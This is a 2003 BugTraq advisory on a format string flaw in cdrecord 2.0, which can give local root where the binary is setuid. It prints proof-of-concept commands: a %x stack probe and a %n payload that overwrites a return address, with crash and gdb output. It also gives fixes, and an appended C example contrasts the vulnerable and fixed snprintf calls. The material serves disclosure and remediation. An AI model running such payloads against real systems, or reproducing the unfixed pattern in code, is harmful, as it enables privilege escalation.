BugTraq
cdrtools2.0 Format String Vulnerability May 13 2003 08:27AM
Stefano Di Paola (st0r1e libero it)

----------------------------------------------------------------------------
PACKAGE  : cdrtools
VERSION  : 2.0
SUMMARY  : Format String
SEVERITY : local root exploit if suid (on several distros)
DATE     : 2003-05-05
----------------------------------------------------------------------------

Hi,
I would like to inform you that there is a format string vulnerability
in cdrecord 2.0, in particular in libscg/scsiopen.c at line 273, I
suppose:

--------------------------------------------------------------
271     if (scg__open(scgp, devname) <= 0) {
272         if (errs && scgp->errstr)
>>>273          js_snprintf(errs, slen, scgp->errstr);<<<<
274         scg_sfree(scgp);
275         return ((SCSI *)0);
276     }
_______________________________________________________
!------- W A R N I N G -----------!
!--- this is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as setuid program so this is a real
security hole.

e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jörg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
As you can see, the last %x refers to AAAABBBBCCCC, so I can use %n for
overwriting anything I want:
e.g. I can find on the stack the location of the return address...
let's say 0xbffcffcc:
$ ./cdrecord dev=`printf "\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"` c/int.c
.....snip....
(core dump)
$ gdb `which cdrecord` core -q
....snip...
#0 0x3f in ?? ()
(gdb) bt
#0 0x3f in ?? ()
#1 0x8065451 in scg_open ()
#2 0x8049a3b in main ()
...

So it's exploitable.

Solutions:

A. Updated package can be found on:

ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

B. Replace line 273 of libscg/scsiopen.c with:
js_snprintf(errs, slen, "%s", scgp->errstr);

C. Remove the suid bit with:
chmod 755 `which cdrecord`

Regards,
Stefano Di Paola

------------------

Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com
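The call at line 273 and the "%s" fix from solution B, side by side, as an added C example that is not part of the advisory or of cdrtools: js_snprintf is stood in for by the standard snprintf, and the sample error text is constructed. The probe uses "%%" rather than the report's "%x"/"%n" because it is the one conversion that consumes no argument, so the demonstration stays well defined while still showing that the vulnerable path parses user data as a format.

```c
#include <stdio.h>
#include <string.h>

#define ERRLEN 128

/* Stand-in for the original line 273: the error text, which embeds the
 * user-supplied devname, is passed as the FORMAT argument of snprintf. */
static int format_error_vulnerable(char *errs, size_t slen, const char *errstr)
{
    return snprintf(errs, slen, errstr);  /* user data parsed for directives */
}

/* The fix (solution B): a fixed "%s" format with the user data as an
 * argument, so any '%' in it is copied literally, never interpreted. */
static int format_error_fixed(char *errs, size_t slen, const char *errstr)
{
    return snprintf(errs, slen, "%s", errstr);
}

typedef int (*fmt_fn)(char *, size_t, const char *);

/* Regression check for the fix: number of input bytes that did not
 * survive formatting through fn. 0 means no directive was consumed. */
static int bytes_lost(fmt_fn fn, const char *errstr)
{
    char buf[ERRLEN];
    return (int)strlen(errstr) - fn(buf, sizeof buf, errstr);
}

/* Constructed sample in the shape of the report's probe. "%%" is used
 * because it is the one conversion that takes no argument, so the
 * vulnerable path stays well defined here; "%x" or "%n" would read or
 * write memory through the same mechanism. */
static const char SAMPLE_ERRSTR[] = "Cannot open 'AAAA|%%'";

int main(void)
{
    char buf[ERRLEN];
    format_error_vulnerable(buf, sizeof buf, SAMPLE_ERRSTR);
    printf("vulnerable: %s  (lost %d byte)\n", buf,
           bytes_lost(format_error_vulnerable, SAMPLE_ERRSTR));
    format_error_fixed(buf, sizeof buf, SAMPLE_ERRSTR);
    printf("fixed     : %s  (lost %d bytes)\n", buf,
           bytes_lost(format_error_fixed, SAMPLE_ERRSTR));
    return 0;
}
```

A non-zero bytes_lost on a string containing '%' is the quickest check that a logging or error path still hands user data to a printf-family function as the format.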

Copyright 2010, SecurityFocus